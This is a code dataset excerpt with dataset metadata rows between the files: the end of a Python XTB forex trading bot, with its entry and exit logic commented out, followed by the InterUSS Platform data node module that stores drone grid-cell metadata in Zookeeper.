elif timeframe == "m5" and currenttime.second == 0 and currenttime.minute % 5 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m5 bar...'):
time.sleep(240)
elif timeframe == "m15" and currenttime.second == 0 and currenttime.minute % 15 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m15 bar...'):
time.sleep(840)
elif timeframe == "m30" and currenttime.second == 0 and currenttime.minute % 30 == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for m30 bar...'):
time.sleep(1740)
elif currenttime.second == 0 and currenttime.minute == 0 and getLatestPriceData():
Update()
with Spinner('Waiting for H1 bar...'):
time.sleep(3540)
with Spinner('Waiting for m1 bar...'):
time.sleep(1)
# Returns True when pricedata is properly updated
def getLatestPriceData():
global pricedata
# Normal operation will update pricedata on first attempt
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
new_pricedata = pd.DataFrame(data=d)
if new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] != pricedata['timestamp'][len(pricedata['timestamp'])-1]:
pricedata = new_pricedata
return True
counter = 0
# If data is not available on first attempt, try up to 6 times to update pricedata
while new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] == pricedata['timestamp'][len(pricedata['timestamp'])-1] and counter < 6:
print(f"{bcolors.BOLD}No updated prices found, trying again in 10 seconds...{bcolors.ENDC}")
print("")
counter+=1
with Spinner('Still waiting for next bar...'):
time.sleep(10)
d = client.get_lastn_candle_history([symbol], mn_timeframe, numberofcandles)
new_pricedata = pd.DataFrame(data=d)
    # Final check after the retry loop: only report success if fresher data arrived
    if new_pricedata['timestamp'][len(new_pricedata['timestamp'])-1] != pricedata['timestamp'][len(pricedata['timestamp'])-1]:
        pricedata = new_pricedata
        return True
    else:
        return False
# Returns true if stream1 crossed over stream2 in most recent candle, stream2 can be integer/float or data array
def crossesOver(stream1, stream2):
# If stream2 is an int or float, check if stream1 has crossed over that fixed number
if isinstance(stream2, int) or isinstance(stream2, float):
if stream1[len(stream1)-1] <= stream2:
return False
else:
if stream1[len(stream1)-2] > stream2:
return False
elif stream1[len(stream1)-2] < stream2:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2:
x = x + 1
if stream1[len(stream1)-x] < stream2:
return True
else:
return False
# Check if stream1 has crossed over stream2
else:
if stream1[len(stream1)-1] <= stream2[len(stream2)-1]:
return False
else:
if stream1[len(stream1)-2] > stream2[len(stream2)-2]:
return False
elif stream1[len(stream1)-2] < stream2[len(stream2)-2]:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2[len(stream2)-x]:
x = x + 1
if stream1[len(stream1)-x] < stream2[len(stream2)-x]:
return True
else:
return False
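# Illustrative examples of the semantics above (not part of the strategy logic;
# the values are made up): crossesOver([1.0, 0.9, 1.1], 1.0) -> True, because the
# previous bar closed below 1.0 and the latest bar closed above it, whereas
# crossesOver([1.0, 1.2, 1.3], 1.0) -> False, since no crossing happened on the
# most recent candle.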
# Returns true if stream1 crossed under stream2 in most recent candle, stream2 can be integer/float or data array
def crossesUnder(stream1, stream2):
# If stream2 is an int or float, check if stream1 has crossed under that fixed number
if isinstance(stream2, int) or isinstance(stream2, float):
if stream1[len(stream1)-1] >= stream2:
return False
else:
if stream1[len(stream1)-2] < stream2:
return False
elif stream1[len(stream1)-2] > stream2:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2:
x = x + 1
if stream1[len(stream1)-x] > stream2:
return True
else:
return False
# Check if stream1 has crossed under stream2
else:
if stream1[len(stream1)-1] >= stream2[len(stream2)-1]:
return False
else:
if stream1[len(stream1)-2] < stream2[len(stream2)-2]:
return False
elif stream1[len(stream1)-2] > stream2[len(stream2)-2]:
return True
else:
x = 2
while stream1[len(stream1)-x] == stream2[len(stream2)-x]:
x = x + 1
if stream1[len(stream1)-x] > stream2[len(stream2)-x]:
return True
else:
return False
# This function places a market order in the direction BuySell, "B" = Buy, "S" = Sell, uses symbol, amount, stop, limit
def enter(BuySell, stop, limit):
volume = amount
order = 'buy'
if BuySell == "S":
order = 'sell'
try:
msg = ' Opening tradeID for symbol ' + symbol
NotifyLogInfo(msg)
opentrade = client.open_trade(order, symbol, amount)
except:
msg = ' Error Opening Trade.'
NotifyLogError(msg)
else:
msg = ' Trade Opened Successfully.'
LOGGER.info(msg)
# This function closes all positions that are in the direction BuySell, "B" = Close All Buy Positions, "S" = Close All Sell Positions, uses symbol
def exit(BuySell=None):
openpositions = client.get_trades()
isbuy = 0
if BuySell == "S":
isbuy = 1
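    # Note: 'isbuy' actually holds the cmd code to match against (by the XTB xAPI
    # convention, cmd 0 = BUY and 1 = SELL); the variable name is kept from the
    # original script.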
for position in openpositions:
if position['symbol'] == symbol:
if BuySell is None or position['cmd'] == isbuy:
msg = ' Closing tradeID : ' + str(position['order'])
NotifyLogInfo(msg)
try:
closetrade = client.close_trade(position['order'])
except:
msg = " Error Closing Trade."
NotifyLogError(msg)
else:
msg = " Trade Closed Successfully."
LOGGER.info(msg)
# Returns number of Open Positions for symbol in the direction BuySell, returns total number of both Buy and Sell positions if no direction is specified
def countOpenTrades(BuySell=None):
openpositions = client.get_trades()
counter = 0
isbuy = 0
if BuySell == "S":
isbuy = 1
for keys in openpositions:
if keys['symbol'] == symbol:
if BuySell is None or keys['cmd'] == isbuy:
counter+=1
return counter
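# For instance (hypothetical state): countOpenTrades('B') counts only open buy
# positions on `symbol`, countOpenTrades('S') only the sells, and
# countOpenTrades() counts both.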
def Update():
print(f"{bcolors.HEADER}==================================================================================={bcolors.ENDC}")
print(f"{bcolors.BOLD}" + str(dt.datetime.now()) + f"{bcolors.ENDC}" + " " + timeframe + " Bar Closed - Running Update Function...")
print("Version : " + f"{bcolors.BOLD}" + version + ' ' + sys.argv[0] + f"{bcolors.ENDC}")
print("Symbol : " + f"{bcolors.BOLD}" + symbol + f"{bcolors.ENDC}")
# Calculate Indicators
macd = ta.MACD(pricedata['close'])
pricedata['cci'] = ta.CCI(pricedata['high'],pricedata['low'],pricedata['close'])
iBBUpper = bb.upper_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iBBMiddle = bb.middle_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iBBLower = bb.lower_bollinger_band(pricedata['close'], bb_periods, bb_standard_deviations)
iRSI = rsi(pricedata['close'], rsi_periods)
# Declare simplified variable names for most recent close candle
pricedata['macd'] = macd[0]
pricedata['macdsignal'] = macd[1]
pricedata['macdhist'] = macd[2]
BBUpper = iBBUpper[len(iBBUpper)-1]
BBMiddle = iBBMiddle[len(iBBMiddle)-1]
BBLower = iBBLower[len(iBBLower)-1]
close_price = pricedata['close'][len(pricedata)-1]
last_close_price = pricedata['close'][len(pricedata)-2]
macd_now = pricedata['macd'][len(pricedata)-1]
macdsignal = pricedata['macdsignal'][len(pricedata)-1]
macdhist = pricedata['macdhist'][len(pricedata)-1]
cci = pricedata['cci'][len(pricedata)-1]
rsi_now = iRSI[len(iRSI)-1]
## DEBUG FULL
#print(pricedata.to_string())
# Print Price/Indicators
if close_price > last_close_price:
print(f"Close Price : {bcolors.OKGREEN}" + str(close_price) + f"{bcolors.ENDC}")
elif close_price < last_close_price:
print(f"Close Price : {bcolors.FAIL}" + str(close_price) + f"{bcolors.ENDC}")
else:
print(f"Close Price : {bcolors.OKCYAN}" + str(close_price) + f"{bcolors.ENDC}")
print("MACD : " + str(macd_now))
print("Signal MACD : " + str(macdsignal))
print("MACD History : " + str(macdhist))
if cci <= -50:
print(f"{bcolors.OKGREEN}CCI : " + str(cci) + f"{bcolors.ENDC}")
elif cci >= 100:
print(f"{bcolors.FAIL}CCI : " + str(cci) + f"{bcolors.ENDC}")
else:
print(f"{bcolors.OKCYAN}CCI : " + str(cci) + f"{bcolors.ENDC}")
print("RSI : " + str(rsi_now))
# Change Any Existing Trades' Limits to Middle Bollinger Band
if countOpenTrades()>0:
openpositions = client.get_trades()
for position in openpositions:
if position['symbol'] == symbol and ((position['cmd'] == 0) or (position['cmd'] == 1)):
NotifyLogInfo("Changing Limit for tradeID: " + str(position['order']))
try:
NotifyLogInfo('client.trade_transaction')
#client.trade_transaction(symbol, position['cmd'], trans_type, volume, stop_loss=0, take_profit=0)
except:
NotifyLogError(" Error Changing Limit :(")
else:
print(" Limit Changed Successfully. ;)")
# # Entry Logic
# if countOpenTrades('B') == 0:
# if ((crossesOver(pricedata['macd'], macdsignal) & (cci <= -50.0))):
# print(f"{bcolors.OKGREEN} BUY SIGNAL ! MACD{bcolors.ENDC}")
# NotifyLogInfo(" Opening " + symbol + " Buy Trade... MACD")
# stop = round((pricedata['close'][len(pricedata['close'])-1] * buy_stop_loss), 5)
# limit = round((pricedata['close'][len(pricedata['close'])-1] * buy_take_profit), 5)
# #enter('B', stop, limit)
# elif (crossesOver(iRSI, lower_rsi) and close_price < BBLower):
# print(f"{bcolors.OKGREEN} BUY SIGNAL ! RSI{bcolors.ENDC}")
# NotifyLogInfo(" Opening " + symbol + " Buy Trade... RSI")
# #stop = pricedata['close'][len(pricedata['close'])-1] - (BBMiddle - pricedata['close'][len(pricedata['close'])-1])
# stop = round((pricedata['close'][len(pricedata['close'])-1] * buy_stop_loss), 5)
# limit = BBMiddle
# #enter('B', stop, limit)
# if (countOpenTrades('S') == 0 and close_price > BBUpper):
# if crossesUnder(iRSI, upper_rsi):
# print(f"{bcolors.FAIL} SELL SIGNAL ! RSI{bcolors.ENDC}")
# NotifyLogInfo(' Opening ' + symbol + ' Sell Trade... RSI')
# stop = pricedata['close'][len(pricedata['close'])-1] + (pricedata['close'][len(pricedata['close'])-1] - BBMiddle)
# limit = BBMiddle
# #enter('S', stop, limit)
# elif (crossesUnder(pricedata['macd'], macdsignal) and macd_now > 0):
# print(f"{bcolors.FAIL} SELL SIGNAL ! MACD{bcolors.ENDC}")
# NotifyLogInfo(' Opening ' + symbol + ' Sell Trade... MACD')
# stop = pricedata['close'][len(pricedata['close'])-1] + (pricedata['close'][len(pricedata['close'])-1] - BBMiddle)
# limit = BBMiddle
# #enter('S', stop, limit)
# # Exit Logic
# if countOpenTrades('B') > 0:
# if ((crossesUnder(pricedata['macd'], macdsignal) & (cci >= 100.0))):
# NotifyLogInfo(' Closing ' + symbol + ' Buy Trade(s)... Reason : MACD')
# #exit('B')
# elif (crossesUnder(iRSI, upper_rsi)):
# NotifyLogInfo(' Closing ' + symbol + ' Buy Trade(s)... Reason : RSI')
# #exit('B')
# if countOpenTrades('S') > 0:
# if (iRSI[len(iRSI)-1] < lower_rsi):
# NotifyLogInfo(' Closing ' + symbol + ' SELL Trade because of RSI')
# #exit('S')
# elif (close_price < BBMiddle):
# NotifyLogInfo(' Closing ' + symbol + ' SELL Trade because of BBMiddle')
# #exit('S')
print(f"{bcolors.BOLD}" + str(dt.datetime.now()) + f"{bcolors.ENDC}" + " " + timeframe + " Update Function Completed.\n")
def handle_exception():
NotifyLogError("Exception handled on " + symbol + " ! Restarting...")
main()
## STARTING TRADING LOOP
def main():
try:
Prepare()
StrategyHeartBeat()
except KeyboardInterrupt:
print("")
print(f"{bcolors.WARNING}Shutdown requested by Operator... Exiting !{bcolors.ENDC}")
print("")
NormalExit()
    # Catch the library-specific error first; a bare Exception handler listed
    # above it would otherwise make the ServerError branch unreachable.
    except ServerError:
        traceback.print_exc(file=sys.stdout)
        NotifyLogError("SERVER ERROR on Bot XTB " + symbol + " ! Bot Stopped.")
        handle_exception()
    except Exception:
        traceback.print_exc(file=sys.stdout)
        LOGGER.error("EXCEPTION on Bot XTB " + symbol + " ! Bot Stopped.")
        handle_exception()
if __name__ == "__main__":
main()
NormalExit()
| 40.459459 | 152 | 0.590874 | 1,798 | 0.09239 | 0 | 0 | 0 | 0 | 0 | 0 | 7,124 | 0.366065 |
1fa915f1d01ae50c5c5d775a6b404ccefbb0a1db
| 23,609 |
py
|
Python
|
datanode/src/storage_interface.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | null | null | null |
datanode/src/storage_interface.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 1 |
2021-03-26T12:13:17.000Z
|
2021-03-26T12:13:17.000Z
|
datanode/src/storage_interface.py
|
isabella232/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 2 |
2019-08-11T20:20:32.000Z
|
2021-03-26T12:01:43.000Z
|
"""The InterUSS Platform Data Node storage API server.
This flexible and distributed system is used to connect multiple USSs operating
in the same general area to share safety information while protecting the
privacy of USSs, businesses, operators, and consumers. The system is focused on
facilitating communication amongst actively operating USSs with no details about
UAS operations stored or processed on the InterUSS Platform.
A data node contains all of the API, logic, and data consistency infrastructure
required to perform CRUD (Create, Read, Update, Delete) operations on specific
grid cells. Multiple data nodes can be executed to increase resilience and
availability. This is achieved by a stateless API to service USSs, an
information interface to translate grid cell USS information into the correct
data storage format, and an information consistency store to ensure data is up
to date.
This module is the information interface to Zookeeper.
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the 'License');
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an 'AS IS' BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import logging
# Our data structure for the actual metadata stored
import uss_metadata
# Utilities for validating slippy
import slippy_util
# Kazoo is the zookeeper wrapper for python
from kazoo.client import KazooClient
from kazoo.exceptions import KazooException
from kazoo.exceptions import BadVersionError
from kazoo.exceptions import NoNodeError
from kazoo.exceptions import RolledBackError
from kazoo.handlers.threading import KazooTimeoutError
from kazoo.protocol.states import KazooState
# logging is our log infrastructure used for this application
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO)
log = logging.getLogger('InterUSS_DataNode_InformationInterface')
# CONSTANTS
# Lock stores in this format /uss/gridcells/{z}/{x}/{y}/manifest
USS_BASE_PREFIX = '/uss/gridcells/'
TEST_BASE_PREFIX = '/test/'
USS_METADATA_FILE = '/manifest'
BAD_CHARACTER_CHECK = '\';(){}[]!@#$%^&*|"<>'
CONNECTION_TIMEOUT = 2.5 # seconds
DEFAULT_CONNECTION = 'localhost:2181'
GRID_PATH = USS_BASE_PREFIX
MAX_SAFE_INTEGER = 9007199254740991
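# Note: MAX_SAFE_INTEGER is 2**53 - 1, the largest integer representable exactly
# in an IEEE-754 double (JavaScript's Number.MAX_SAFE_INTEGER); hashed sync
# tokens are truncated to this range so they stay portable across client languages.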
class USSMetadataManager(object):
"""Interfaces with the locking system to get, put, and delete USS metadata.
  Metadata gets/stores/deletes the USS information for a particular grid,
including current version number, a list of USSs with active operations,
and the endpoints to get that information. Locking is assured through a
snapshot token received when getting, and used when putting.
"""
def __init__(self, connectionstring=DEFAULT_CONNECTION, testgroupid=None):
"""Initializes the class.
Args:
connectionstring:
Zookeeper connection string - server:port,server:port,...
testgroupid:
ID to use if in test mode, none for normal mode
"""
if testgroupid:
self.set_testmode(testgroupid)
if not connectionstring:
connectionstring = DEFAULT_CONNECTION
log.debug('Creating metadata manager object and connecting to zookeeper...')
try:
if set(BAD_CHARACTER_CHECK) & set(connectionstring):
raise ValueError
self.zk = KazooClient(hosts=connectionstring, timeout=CONNECTION_TIMEOUT)
self.zk.add_listener(self.zookeeper_connection_listener)
self.zk.start()
if testgroupid:
self.delete_testdata(testgroupid)
except KazooTimeoutError:
log.error('Unable to connect to zookeeper using %s connection string...',
connectionstring)
raise
except ValueError:
log.error('Connection string %s seems invalid...', connectionstring)
raise
def __del__(self):
log.debug('Destroying metadata manager object and disconnecting from zk...')
self.zk.stop()
def get_state(self):
return self.zk.state
def get_version(self):
try:
return True, self.zk.server_version()
except KazooException as e:
msg = str(e)
return False, type(e).__name__ + (' ' + msg if msg else '')
def set_verbose(self):
log.setLevel(logging.DEBUG)
def set_testmode(self, testgroupid='UNDEFINED_TESTER'):
"""Sets the mode to testing with the specific test ID, cannot be undone.
Args:
testgroupid: ID to use if in test mode, none for normal mode
"""
global GRID_PATH
global CONNECTION_TIMEOUT
# Adjust parameters specifically for the test
GRID_PATH = TEST_BASE_PREFIX + testgroupid + USS_BASE_PREFIX
log.debug('Setting test path to %s...', GRID_PATH)
CONNECTION_TIMEOUT = 1.0
def zookeeper_connection_listener(self, state):
if state == KazooState.LOST:
# Register somewhere that the session was lost
log.error('Lost connection with the zookeeper servers...')
elif state == KazooState.SUSPENDED:
# Handle being disconnected from Zookeeper
log.error('Suspended connection with the zookeeper servers...')
elif state == KazooState.CONNECTED:
# Handle being connected/reconnected to Zookeeper
log.info('Connection restored with the zookeeper servers...')
def delete_testdata(self, testgroupid=None):
"""Removes the test data from the servers.
Be careful when using this in parallel as it removes everything under
    the testgroupid, or everything if no testgroupid is provided.
Args:
testgroupid: ID to use if in test mode, none will remove all test data
"""
if testgroupid:
path = TEST_BASE_PREFIX + testgroupid
else:
path = TEST_BASE_PREFIX
self.zk.delete(path, recursive=True)
def get(self, z, x, y):
"""Gets the metadata and snapshot token for a GridCell.
Reads data from zookeeper, including a snapshot token. The
snapshot token is used as a reference when writing to ensure
the data has not been updated between read and write.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
# TODO(hikevin): Change to use our own error codes and let the server
# convert them to http error codes. For now, this is
# at least in a standard JSend format.
status = 500
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
try:
m = uss_metadata.USSMetadata(content)
status = 200
result = {
'status': 'success',
'sync_token': metadata.last_modified_transaction_id,
'data': m.to_json()
}
except ValueError:
status = 424
else:
status = 404
else:
status = 400
if status != 200:
result = self._format_status_code_to_jsend(status)
return result
def set(self, z, x, y, sync_token, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation):
"""Sets the metadata for a GridCell.
Writes data, using the snapshot token for confirming data
has not been updated since it was last read.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
sync_token: token retrieved in the original GET GridCellMetadata,
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
if slippy_util.validate_slippy(z, x, y):
# first we have to get the cell
(content, metadata) = self._get_raw(z, x, y)
if metadata:
# Quick check of the token, another is done on the actual set to be sure
# but this check fails early and fast
if str(metadata.last_modified_transaction_id) == str(sync_token):
try:
m = uss_metadata.USSMetadata(content)
log.debug('Setting metadata for %s...', uss_id)
if not m.upsert_operator(uss_id, ws_scope, operation_format,
operation_ws, earliest_operation,
latest_operation, z, x, y):
log.error('Failed setting operator for %s with token %s...',
uss_id, str(sync_token))
raise ValueError
status = self._set_raw(z, x, y, m, metadata.version)
except ValueError:
status = 424
else:
status = 409
else:
status = 404
else:
status = 400
if status == 200:
# Success, now get the metadata back to send back
result = self.get(z, x, y)
else:
result = self._format_status_code_to_jsend(status)
return result
def delete(self, z, x, y, uss_id):
"""Sets the metadata for a GridCell by removing the entry for the USS.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
uss_id: is the plain text identifier for the USS
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
status = 500
if slippy_util.validate_slippy(z, x, y):
# first we have to get the cell
(content, metadata) = self._get_raw(z, x, y)
if metadata:
try:
m = uss_metadata.USSMetadata(content)
m.remove_operator(uss_id)
# TODO(pelletierb): Automatically retry on delete
status = self._set_raw(z, x, y, m, metadata.version)
except ValueError:
status = 424
else:
status = 404
else:
status = 400
if status == 200:
# Success, now get the metadata back to send back
(content, metadata) = self._get_raw(z, x, y)
result = {
'status': 'success',
'sync_token': metadata.last_modified_transaction_id,
'data': m.to_json()
}
else:
result = self._format_status_code_to_jsend(status)
return result
def get_multi(self, z, grids):
"""Gets the metadata and snapshot token for multiple GridCells.
Reads data from zookeeper, including a composite snapshot token. The
snapshot token is used as a reference when writing to ensure
the data has not been updated between read and write.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
try:
combined_meta, syncs = self._get_multi_raw(z, grids)
log.debug('Found sync token %s for %d grids...',
self._hash_sync_tokens(syncs), len(syncs))
result = {
'status': 'success',
'sync_token': self._hash_sync_tokens(syncs),
'data': combined_meta.to_json()
}
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
except IndexError as e:
result = self._format_status_code_to_jsend(404, e.message)
return result
def set_multi(self, z, grids, sync_token, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation):
"""Sets multiple GridCells metadata at once.
Writes data, using the hashed snapshot token for confirming data
has not been updated since it was last read.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to update
sync_token: token retrieved in the original get_multi,
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
log.debug('Setting multiple grid metadata for %s...', uss_id)
try:
# first, get the affected grid's sync tokens
m, syncs = self._get_multi_raw(z, grids)
del m
# Quick check of the token, another is done on the actual set to be sure
# but this check fails early and fast
log.debug('Found sync token %d for %d grids...',
self._hash_sync_tokens(syncs), len(syncs))
if str(self._hash_sync_tokens(syncs)) == str(sync_token):
log.debug('Composite sync_token matches, continuing...')
self._set_multi_raw(z, grids, syncs, uss_id, ws_scope, operation_format,
operation_ws, earliest_operation, latest_operation)
log.debug('Completed updating multiple grids...')
else:
raise KeyError('Composite sync_token has changed')
combined_meta, new_syncs = self._get_multi_raw(z, grids)
result = {
'status': 'success',
'sync_token': self._hash_sync_tokens(new_syncs),
'data': combined_meta.to_json()
}
except (KeyError, RolledBackError) as e:
result = self._format_status_code_to_jsend(409, e.message)
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
except IndexError as e:
result = self._format_status_code_to_jsend(404, e.message)
return result
def delete_multi(self, z, grids, uss_id):
"""Sets multiple GridCells metadata by removing the entry for the USS.
Removes the operator from multiple cells. Does not return 404 on
not finding the USS in a cell, since this should be a remove all
    type function, as some cells might have the uss_id and some might not.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to delete
uss_id: is the plain text identifier for the USS
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
log.debug('Deleting multiple grid metadata for %s...', uss_id)
try:
if not uss_id:
raise ValueError('Invalid uss_id for deleting multi')
for x, y in grids:
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
m = uss_metadata.USSMetadata(content)
m.remove_operator(uss_id)
# TODO(pelletierb): Automatically retry on delete
status = self._set_raw(z, x, y, m, metadata.version)
else:
raise ValueError('Invalid slippy grids for lookup')
result = self.get_multi(z, grids)
except ValueError as e:
result = self._format_status_code_to_jsend(400, e.message)
return result
######################################################################
################ INTERNAL FUNCTIONS #########################
######################################################################
def _get_raw(self, z, x, y):
"""Gets the raw content and metadata for a GridCell from zookeeper.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
Returns:
content: USS metadata
metadata: straight from zookeeper
"""
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
log.debug('Getting metadata from zookeeper@%s...', path)
try:
c, m = self.zk.get(path)
except NoNodeError:
self.zk.ensure_path(path)
c, m = self.zk.get(path)
if c:
log.debug('Received raw content and metadata from zookeeper: %s', c)
if m:
log.debug('Received raw metadata from zookeeper: %s', m)
return c, m
def _set_raw(self, z, x, y, m, version):
"""Grabs the lock and updates the raw content for a GridCell in zookeeper.
Args:
z: zoom level in slippy tile format
x: x tile number in slippy tile format
y: y tile number in slippy tile format
m: metadata object to write
version: the metadata version verified from the sync_token match
Returns:
200 for success, 409 for conflict, 408 for unable to get the lock
"""
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
try:
log.debug('Setting metadata to %s...', str(m))
self.zk.set(path, json.dumps(m.to_json()), version)
status = 200
except BadVersionError:
log.error('Sync token updated before write for %s...', path)
status = 409
return status
def _get_multi_raw(self, z, grids):
"""Gets the raw content and metadata for multiple GridCells from zookeeper.
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
Returns:
content: Combined USS metadata
syncs: list of sync tokens in the same order as the grids
Raises:
IndexError: if it cannot find anything in zookeeper
ValueError: if the grid data is not in the right format
"""
log.debug('Getting multiple grid metadata for %s...', str(grids))
combined_meta = None
syncs = []
for x, y in grids:
if slippy_util.validate_slippy(z, x, y):
(content, metadata) = self._get_raw(z, x, y)
if metadata:
combined_meta += uss_metadata.USSMetadata(content)
syncs.append(metadata.last_modified_transaction_id)
else:
raise IndexError('Unable to find metadata in platform')
else:
raise ValueError('Invalid slippy grids for lookup')
if len(syncs) == 0:
raise IndexError('Unable to find metadata in platform')
return combined_meta, syncs
def _set_multi_raw(self, z, grids, sync_tokens, uss_id, ws_scope,
operation_format, operation_ws, earliest_operation, latest_operation):
"""Grabs the lock and updates the raw content for multiple GridCells
Args:
z: zoom level in slippy tile format
grids: list of (x,y) tiles to retrieve
sync_tokens: list of the sync tokens received during get operation
uss_id: plain text identifier for the USS,
ws_scope: scope to use to obtain OAuth token,
operation_format: output format for operation ws (i.e. NASA, GUTMA),
operation_ws: submitting USS endpoint where all flights in
this cell can be retrieved from,
earliest_operation: lower bound of active or planned flight timestamp,
used for quick filtering conflicts.
latest_operation: upper bound of active or planned flight timestamp,
used for quick filtering conflicts.
Raises:
IndexError: if it cannot find anything in zookeeper
ValueError: if the grid data is not in the right format
"""
log.debug('Setting multiple grid metadata for %s...', str(grids))
try:
contents = []
for i in range(len(grids)):
# First, get and update them all in memory, validate the sync_token
x = grids[i][0]
y = grids[i][1]
sync_token = sync_tokens[i]
path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y),
USS_METADATA_FILE)
(content, metadata) = self._get_raw(z, x, y)
if str(metadata.last_modified_transaction_id) == str(sync_token):
log.debug('Sync_token matches for %d, %d...', x, y)
m = uss_metadata.USSMetadata(content)
if not m.upsert_operator(uss_id, ws_scope, operation_format,
operation_ws, earliest_operation,
latest_operation, z, x, y):
raise ValueError('Failed to set operator content')
contents.append((path, m, metadata.version))
else:
log.error(
'Sync token from USS (%s) does not match token from zk (%s)...',
str(sync_token), str(metadata.last_modified_transaction_id))
raise KeyError('Composite sync_token has changed')
# Now, start a transaction to update them all
# the version will catch any changes and roll back any attempted
# updates to the grids
log.debug('Starting transaction to write all grids at once...')
t = self.zk.transaction()
for path, m, version in contents:
t.set_data(path, json.dumps(m.to_json()), version)
log.debug('Committing transaction...')
results = t.commit()
if isinstance(results[0], RolledBackError):
raise KeyError('Rolled back multi-grid transaction due to grid change')
log.debug('Committed transaction successfully.')
except (KeyError, ValueError, IndexError) as e:
log.error('Error caught in set_multi_raw %s.', e.message)
raise e
def _format_status_code_to_jsend(self, status, message=None):
"""Formats a response based on HTTP status code.
Args:
status: HTTP status code
message: optional message to override preset message for codes
Returns:
JSend formatted response (https://labs.omniti.com/labs/jsend)
"""
if status == 200 or status == 204:
result = {'status': 'success', 'code': 204, 'message': 'Empty data set.'}
elif status == 400:
result = {
'status': 'fail',
'code': status,
'message': 'Parameters are not following the correct format.'
}
elif status == 404:
result = {
'status': 'fail',
'code': status,
'message': 'Unable to pull metadata from lock system.'
}
elif status == 408:
result = {
'status': 'fail',
'code': status,
'message': 'Timeout trying to get lock.'
}
elif status == 409:
result = {
'status':
'fail',
'code':
status,
'message':
'Content in metadata has been updated since provided sync token.'
}
elif status == 424:
result = {
'status':
'fail',
'code':
status,
'message':
'Content in metadata is not following JSON format guidelines.'
}
else:
result = {
'status': 'fail',
'code': status,
'message': 'Unknown error code occurred.'
}
if message:
result['message'] = message
return result
@staticmethod
def _hash_sync_tokens(syncs):
"""Hashes a list of sync tokens into a single, positive 64-bit int.
For various languages, the limit to integers may be different, therefore
we truncate to ensure the hash is the same on all implementations.
"""
return abs(hash(tuple(sorted(syncs)))) % MAX_SAFE_INTEGER
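    # For example (hypothetical tokens): _hash_sync_tokens([42, 7, 19]) returns
    # abs(hash((7, 19, 42))) % MAX_SAFE_INTEGER, so the order of the input list
    # does not affect the composite token.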
| 38.264182 | 80 | 0.656275 | 21,020 | 0.890338 | 0 | 0 | 336 | 0.014232 | 0 | 0 | 12,793 | 0.54187 |
1fa9bd99cc0cefda66b99c89d32eb998269a611a
| 32,069 |
py
|
Python
|
snape/flicker.py
|
SuryaThiru/snape
|
3402af05ad2ccba958888befa5177a4850adbf7f
|
[
"Apache-2.0"
] | 182 |
2016-12-14T21:09:42.000Z
|
2022-03-04T03:39:46.000Z
|
snape/flicker.py
|
SuryaThiru/snape
|
3402af05ad2ccba958888befa5177a4850adbf7f
|
[
"Apache-2.0"
] | 15 |
2016-12-06T18:37:08.000Z
|
2020-07-31T17:30:00.000Z
|
core/flicker.py
|
slizb/iglu
|
